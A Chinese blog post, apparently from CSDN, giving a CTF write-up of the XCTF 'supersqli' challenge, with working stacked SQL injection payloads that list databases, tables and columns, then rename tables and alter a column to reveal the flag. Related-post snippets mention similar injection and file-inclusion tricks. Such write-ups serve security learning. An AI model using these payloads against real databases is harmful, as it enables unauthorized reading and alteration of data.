【XCTF高手进阶区】web5_supersqli writeup(旧)

最新推荐文章于 2021-07-25 17:23:01 发布
最新推荐文章于 2021-07-25 17:23:01 发布
阅读量140 收藏
点赞数
分类专栏: CTF 文章标签: plsql sqlserver mysql java sublime text
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mitchell_Donovan/article/details/113665600
版权

web5_supersqli

原题链接

key:SQL堆叠注入+表名修改rename

 

①题目打开后依旧是这个样子的👇

这题虽然还是SQL注入题,但是在旧版本中额外增设了一点难度

 

②和上一篇wp一样,几次尝试提交后得知是单引号闭合,字段数是2

随后尝试联合查询输入

提交inject=1' union select 1,2#后返回了这玩意👇

依旧是这个六亲不认的正则表达式

大小写?nos!双写绕过?nos!

 

③还是需要堆叠注入来查询全部的数据库名👇

1';show databases; #

查询全部表名👇

1';show tables; #

查看这个名字式数字的表存在哪些字段👇

1';show columns from`1919810931114514`;#

这里的表名为数字(字符串),我们要用反引号

 

④想办法查看这个flag字段

这里只有两个表,我们输入1查询出来的结果应该来自words表里

我们又可以通过1' or 1=1#查出这个表中的所有信息

所以这里的思路就是通过把表名1919810931114514改为words,把原来的words表名改成别的名

因为因为没有限制alter,rename和change,所以可以通过修改表名来查flag👇

1';rename tables words to Mitchell;rename tables `1919810931114514` to words;alter table words change flag id varchar(100);#

这里把1919810931114514改成了words,把words改成了Mitchell

 

⑤最后用永真表达式来爆字段

1' or 1=1#

得出flag👇

 

 

Mitch311
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XCTF-WEBWeb_php_unserialize
Lorezon的博客
03-15 542
打开题目是一堆源码: 主要看
writeup:xctf撰写
03-28
写上去xctf撰写
XCTF高手web5_supersqli writeup(新)
Mitchell_Donovan的博客
02-04 1123
web5_supersqli 原题链接 key:SQL堆叠注入 ①题目打开后是这个样子的???? 再根据题目描述???? 大概率是道SQL注入题 ②像bkctf里的那道SQL注入题一样 先把默认的inject=1提交一下 提交inject=1'回显错误,猜测是单引号闭合 提交inject=1'#回显正常,说明是单引号闭合 ③一样的操作,用order by判断联合注入的字段数 提交inject=1' order by 2#,回显正常 提交inject=1
XCTF高手 web5_supersqli writeup(新)
Python研究所
02-05 139
此文转载自:https://blog.csdn.net/Mitchell_Donovan/article/details/113663553#commentBox web5_supersqli 原题链接 key:报错函数+SQL堆叠注入+命令拼接 ①题目打开后是这个样子的???? 再根据题目描述???? 大概率是道SQL注入题 ②像bkctf里的那道SQL注入题一样 先把默认的inject=...
XCTF高手web5_supersqli writeup2.0)
Mitchell_Donovan的博客
02-04 190
web5_supersqli 原题链接 key:SQL堆叠注入+handler语句查询 ①又双叒叕是那道题 我们发现问题的关键就在于如何在被禁用select等语句的情况下完成爆字段的任务 第一次我们用了执行字符串拼接后的命令 第二次我们修改了表名 这一次,来点更高端的操作——handler语句查询 ②题目环境还是基于版本 提交下面的handler语句???? 1'; handler `1919810931114514` open;handler `1919810931114
XCTF高手web1_baby_web writeup
weixin_50464560的博客
07-25 193
web1_baby_web 原题链接 key:php重定向   题目描述:想想初始页面是哪个 ①入环境后页面显示只有HELLO WORLD 抬头看URL地址栏里访问的是1.php 根据题目描述,由初始页面想到index.php 尝试访问index.php,然而却又跳转到1.php   ②思路碰壁,不妨先御剑扫描一下???? 发现只有一个1.php可以访问 ...
XCTF攻防世界 Web高手 supersqli writeup
Senimo
04-01 1011
XCTF攻防世界 Web高手 supersqli writeup supersqli 难度系数: 3.0 题目来源: 强网杯 2019 题目描述:随便注 启动靶机,打开环境: 详细writeup参考: BUUCTF [强网杯 2019] 随便注 ...
XCTF高手web3_php_rce writeup
Mitchell_Donovan的博客
01-21 378
web3_php_rce 原题链接 key:ThinkPHP5远程代码执行漏洞 ①环境打开后页面长这样式的???? ②题目是php_rce,不妨先来了解一下什么是rce???? 知识补充: 1. 什么是rce(远程代码执行漏洞) 远程命令/代码执行漏洞,简称rce漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。RCE分为远程命令执行ping和远程代码执行evel。 2. 漏洞产生的根本原因 服务器没有针对执行函数做过滤,导致在没有指定绝对路径的情
XCTF高手web6_ics-06 writeup
Mitchell_Donovan的博客
02-13 277
web6_ics-06 原题链接 key:burpsuite爆破id ①环境打开后是这样的???? 我把左侧导航栏里的链接试了个遍,只有“报表中心”可以入???? ②这时发现地址栏多出了id=1???? 我把id=1换成了id=2,3,4,5,6,7,8,9后,页面没有变化 再结合题干信息???? 猜测入侵者可能是想通过id来给自己创造一个后门,类似于一种密钥吧 我们的任务就是爆破出id ③burpsuite抓包,右键发送到Intruder爆破 首先确定爆
XCTF高手web4_Web_php_include writeup(一)
Mitchell_Donovan的博客
01-27 325
web4_Web_php_include 原题链接 key:文件包含 ①页面打开后是一串php代码???? <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 先来简单了解一下本题涉及到的几个ph
xctf.rar_HTML5自适应
09-19
这个"xctf.rar"压缩包包含了一个实现HTML5全屏滚动效果的源码,它能实现平滑滚动,并且能够自适应不同浏览器的显示。 全屏滚动,也称为全屏滑动或全景观览,是一种让网页内容以连续的全屏视图展示的设计方式。这种...
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
XCTF_A_应收管理标准功能培训.pptx
10-11
XCTF_A_应收管理标准功能培训】的PPT内容涵盖了Oracle财务系统的应收管理模块,这个模块是企业销售到收款流程中的关键部分。以下是基于提供的文件内容详细解析的知识点: 1. **销售到收款流程概览**: - 销售到...
XCTF_A_物料清单标准功能培训.pptx
10-11
XCTF_A_物料清单标准功能培训中,主要涵盖了Oracle系统的物料管理及相关流程,旨在提升用户对物料清单(BOM)的运用和理解。以下是详细的讲解内容: 1. **物料管理**: - **系统组织架构**:Oracle系统中的组织...
【CTF工具】GitHack下载安装与使用(windows下)
Mitchell_Donovan的博客
04-24 7417
下载方法 ①从github官网下载https://github.com/lijiejie/GitHack ②从codechina镜像站下载https://codechina.csdn.net/mirrors/lijiejie/githack 使用方法 下载之后解压缩,并通过cmd使用 具体操作???? ①win+R打开cmd终端,入githack的目录下 ②使用如下代码行下载???? python GitHack.py http://www.openssl.org(目标网址)/.g
【CTF工具】GitHack下载安装与使用(linux下)
Mitchell_Donovan的博客
04-24 4703
下载方法 ①直接通过git下载 git clone https://github.com/lijiejie/GitHack ②通过git镜像站下载 git clone https://github.com.cnpmjs.org/lijiejie/GitHack 使用方法 ①打开终端,入到GitHacker的目录下 ②运行如下代码???? python GitHack.py http://www.openssl.org(目标网址)/.git/ 执行后会在本目录生成以网址为名字的文
【CTF工具】网址扫描器dirsearch下载安装与使用(linux下)
Mitchell_Donovan的博客
04-26 3999
dirsearch是一个python开发的目录扫描工具 和我们平时使用的dirb、御剑之类的工具一样,就是为了扫描网站的敏感文件和目录从而找到突破口 Linux下的使用教程如下: 下载安装 打开linux终端输入以下代码???? git clone https://github.com/maurosoria/dirsearch.git 使用说明 在终端中打开dirsearch文件夹???? cd dirsearch/ 输入下列命令开始网址扫描???? ./dirsearch.
BugkuCTF web18_秋名山车神 writeup
Mitchell_Donovan的博客
01-11 2463
web18_秋名山车神 原题链接 key:python脚本 ①题目环境里的网页长这样式的???? 意思是2s内让我们算一个变态表达式,疯了吧 刷新多次,发现数字是变化的,问题更严重了...... 不过刷新过程中发现了要提交的参数value???? ②不妨写个(白嫖)python脚本吧 本题采用正则表达式,如果不熟悉这个可以先看看教程:正则教程 import requests #引入request库 import re #引入re库 url = '''http:/
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Mitch311

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值